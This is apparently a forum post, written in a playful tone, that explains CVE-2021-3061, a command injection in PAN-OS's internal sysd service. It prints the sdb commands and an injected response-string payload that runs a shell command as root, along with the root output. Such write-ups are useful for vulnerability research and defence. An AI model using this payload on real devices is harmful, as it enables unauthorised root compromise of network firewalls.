Forum:
hewwo :3
yesterday i showed you how to get code remote code execution as some preppy loser. today i will show you one easy trick to escalate privileges until ur cooler than boxxy.
pan-os internally uses a neat database/ipc service called sysd. sysd allows querying and storing objects (such as the serial number or configuration data) as well as registering as a handler for object accesses and being notified on object updates. sysd can be queried from the shell using the sdb tool:
$ sdb cfg.platform.maccfg.platform.mac: BA:DB:AD:BA:BE:69some configuration parameters can be updated using sdb. for example, the system banner can be updated with something like
sdb -P3 'sys.banner.user={"order": 10, "value":<b3dv>}'the actual handlers for these functions can be defined in any running process, with all sysd communications occurring over the (localhost) network. as you can imagine, the sysd developers trust the inputs to this internal daemon a bit too much.
cve-2021-3061 is a command injection vulnerability in one of these handlers. the sys.root.passwd-response handler handles responses to TAC (debugging) authentication challenges. the handler requires first requesting a challenge, then sending a response which consists of a response-string, login-type, user, and login-ip. the response-string is base64-decoded by sprintf'ing it into a shell command and calling base64 -d. as a result, you can root yourself a shiny new boxxy. i mean box.
$ sdb -P3 sys.root.passwd-challenge=new # request a challenge
sys.root.passwd-challenge: Please use the following string as your challenge:
B44bYsmOh0hoJOSfFRcUvgSNpf+DtJhqHk7AfzErC720ZclSaEsFk7zjWNFbSYPp
$ sdb -P3 -e "sys.root.passwd-response={'response-string':'a\\'|id>/tmp/whoami;\\'','login-type':'evil','user':'gir','login-ip':'1.3.3.7',}" # reply with a perfectly normal response, thank you very much
modify failed: PERMISSION
$ cat /tmp/whoami # owo whats this
uid=0(root) gid=0(root) groups=0(root)
anyways thats all for today folks xD
Report Topic
